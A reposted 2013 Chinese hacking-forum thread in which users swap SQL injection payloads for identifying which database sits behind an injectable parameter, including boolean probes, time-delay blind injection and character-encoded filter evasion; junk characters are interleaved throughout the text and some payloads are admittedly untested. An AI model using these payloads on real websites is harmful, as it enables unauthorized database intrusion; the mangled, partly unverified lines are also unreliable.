一个注射点如何最快速确认是什么类型数据库
8 Z& a( q# o8 t1 _, }6 o+ E0 [/ [2 Kxsser (十根阳具有长短!!) | 2013-02-05 12:36
6 A* k8 Q" `4 V1 [! W F1 z假设这么一个注射点:( ]5 m$ c; T1 t1 F1 h% v9 o, U
show.html?id=2
. h, j0 F) f0 |6 {mysql:id=2 and version()>0
0 \4 d6 C u3 K% Z7 yoracle:id=2 and '1'||'1'='11
$ h% n* L0 {& t5 n' p s6 T其他的欢迎补充
/ o O' y [3 X3 L3 W1#7 w5 O& C _) }$ K( ^: V
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47; }. `5 d" S% R/ x% W% i( p( J
Access:
# J0 k& C3 g* maNd aSc(cHr(97))=97' B- T* w2 Y* N( l- `$ H; P
and exists(select id from MSysAccessObjects)# M, C# W7 L8 O4 g7 m
SQL Server:
6 t( s/ _$ F1 N) vand exists(select id from sysobjects)& J! |0 s5 U' P4 w- A
and length(user)>0( y1 L4 t. O. p3 Z- O9 r( l9 \, } k
MySQL:" {" h7 t) a- A+ O6 W- ^
and length(user())>0
9 `# y! W2 |+ i# w" Z$ I# [7 x2#
7 }% {" ]3 ~/ W5 T4 H/ e+ D8 cxsser (十根阳具有长短!!) | 2013-02-05 12:48
& ~* }. S& ]# z; A5 M3 ?) _# f) K+ p@upload 如果这些都不是呢…* Z+ q4 A J# x4 [: }. [
3#
0 p' z4 s3 h; M# m$ V fupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03
1 g# N" u( U' a, G- T! v. x: j3 r8 v@xsser 不快速的,延时注入5 F `/ A8 u, z9 j) q2 C9 E
不知道这样写对不对5 Q% `# u( }9 O( z6 B7 v' X1 O
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'- \, [9 ]. i0 O! `* `
mysql:id=2 and select benchmark(1e8,current_date());
5 Y1 y0 L; k" c5 F( w! V4#
* K% G* ~" L; s/ ]' c9 yupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:100 v6 R' p ^4 B" L$ C5 G$ P
最快的貌似是看报错信息
6 e6 @9 H# a1 Qoracle error
( L/ u5 w/ S, }; E6 u: Kmssql error/ ]* n4 K9 x' N4 k6 K
mysql error, v0 C, P/ V7 @: A+ Y, v) i: i
5#, d7 F j5 {, j: e. E- d/ m8 j, H+ e
Nimda (你们都是坏银~) | 2013-02-05 13:14
5 f4 H$ t' I t: T. l6 }小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)/ R! \- C9 R$ O% t
6#! } |6 y) g; c4 R$ @! t
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21" n* W4 G" }! Q3 W
“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:" v. s) M7 B5 ?7 x+ @1 f/ q
“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:1 l/ \! U, \: t# \4 w" _9 ?0 _& Z
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。
# ~9 Y8 D7 q" _( \. a8 p& n5 Q7#
; x, m+ V c |: h( {6 x( t. H1 q1 f_Evil (HackEnd) | 2013-02-05 13:33
9 g h2 R* E: X' _PostgreSQL% n+ B* E7 q K& d8 z
8#
% I7 s; i/ b" E# ?upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
+ z6 a: A- b4 g0 n0 e( D8 ~切换编码 and 1=1
- U/ e3 [# s4 c% Qoracle:) V1 ]( l7 [% r3 C3 e
CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)
- i* y* n5 L6 F8 i. Fmssql:
( I2 O6 r* c4 X! G& g" @6 G3 JCHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49), {$ C$ V# j* Z! t( [
mysql:
' f8 t9 Q! h$ `: }CHAR(97, 110, 100, 32, 49, 61, 49)1 V. p+ t7 L8 H6 B X( M Q4 h' d
9#
; I( A6 Z7 m j4 Exsser (十根阳具有长短!!) | 2013-02-05 14:31
3 I" I ~( o. Z2 j/ k& d/ [@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?+ \1 Q3 {9 D5 A' Q
10#
- P- Z; _" y5 \; P y+ x. Z# supload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
; a+ ^* u; \% Q9 x, a@xsser 是奇葩数据库类型的么?
1 _9 M% T* Z" {; D8 I7 C+ N根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:, [/ l) |2 A7 e. G
1.是否可以使用特定的函数来判断,该数据库特有的
% r4 E1 J7 s" V7 ~7 Z, L2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等, G( N3 u& ]+ E2 s/ G/ M
3.是否可以编码查询
3 x- ]4 I: Q/ s5 M4.是否显可以利用错信息8 g% ]6 h3 S2 `6 Z2 E' G4 [! u
5.是否存在数据库某些特性辅助判断
% [3 y; s8 Z& U: r个人见解" h9 i" c0 T6 S1 g- P/ u
11#
) l7 I* P) j" r b. @2 Y9 T小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55
. t' j1 r& \9 x% e9 L已收藏,mssql可以直接看到错误提示的吧~+ Z' g9 d. w7 ?+ }
12#
1 }2 c: {* Y: N) Y8 wPasser_by | 2013-02-05 15:09! e2 \# I1 H' b8 m% Z6 b3 ?3 u/ f
曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。* F$ x' B( S: e7 W, F1 w
from:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对